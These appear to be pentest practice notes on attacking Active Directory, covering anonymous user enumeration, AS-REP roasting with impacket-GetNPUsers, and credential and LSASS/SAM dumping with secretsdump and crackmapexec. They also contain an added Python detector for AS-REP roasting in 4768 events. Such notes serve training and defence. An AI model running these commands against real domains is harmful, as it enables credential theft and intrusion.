Active Directory Security
PRACTICE! PRACTICE! PRACTICE!
Enumerating the usernames first!
If the anonymous user has READ permission on the IPC$ share, then:
$ impacket-lookupsid anonymous@10.10.117.62 | tee users.txt
Meanwhile, run enum4linux in the background:
$ enum4linux -a 10.10.10.x | tee enum4linux.log
If rpcclient allows anonymous login, then:
rpcclient $> enumdomusers
rpcclient $> enumdomgroups

AS-REP Roasting
After finding valid usernames, check whether any account can be AS-REP roasted (Kerberos pre-authentication disabled on the account):
$ impacket-GetNPUsers spooky.local/ -no-pass -usersfile users.txt -dc-ip <target ip>
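From the blue-team side, the request GetNPUsers sends shows up on the domain controller as a Kerberos TGT request (Security event 4768) with Pre-Authentication Type 0, usually asking for an RC4 (0x17) ticket. The following detection logic over constructed 4768 records is an added example, not part of the original notes; the field names and sample values are assumptions modelled on the exported event fields, and the userAccountControl check uses the documented DONT_REQ_PREAUTH bit (0x400000).

```python
# Added example (not from the original notes): flag TGT requests that look like
# AS-REP roasting and audit userAccountControl for accounts that allow it.
from dataclasses import dataclass

# Constructed sample events in the shape of the 4768 fields a SIEM would export.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.20", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "ghost", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x6"},
    {"EventID": 4769, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.20", "Status": "0x0"},
]

DONT_REQ_PREAUTH = 0x400000  # userAccountControl flag that makes an account roastable


@dataclass
class Finding:
    user: str
    source: str
    enc_type: str
    severity: str


def detect_asrep_roast(events):
    """Return one Finding per successful TGT request made without pre-authentication."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4768:
            continue  # only TGT requests (AS-REQ/AS-REP) matter here
        if ev.get("PreAuthType") != "0":
            continue  # pre-auth was performed: nothing to crack offline
        if ev.get("Status") != "0x0":
            continue  # failed request (e.g. 0x6 unknown principal): no AS-REP issued
        enc = ev.get("TicketEncryptionType", "").lower()
        # RC4 is what the cracking tools prefer; AES is still worth a look.
        severity = "high" if enc == "0x17" else "medium"
        findings.append(Finding(ev["TargetUserName"], ev["IpAddress"], enc, severity))
    return findings


def dont_req_preauth(user_account_control: int) -> bool:
    """True when the account's userAccountControl has DONT_REQ_PREAUTH set."""
    return bool(user_account_control & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    for f in detect_asrep_roast(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.user} requested a TGT without pre-auth from {f.source} ({f.enc_type})")
```

Clearing the flag on the account (or at least moving it off RC4 and onto a long random password) removes the condition the detection fires on.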
After obtaining creds
Enumerate shares with those creds -
cme (crackmapexec)
Try dumping the secrets with them -
impacket-secretsdump
Try dumping the SAM and LSASS -
crackmapexec
Check WinRM, SMB and the other services until one of them shows Pwn3d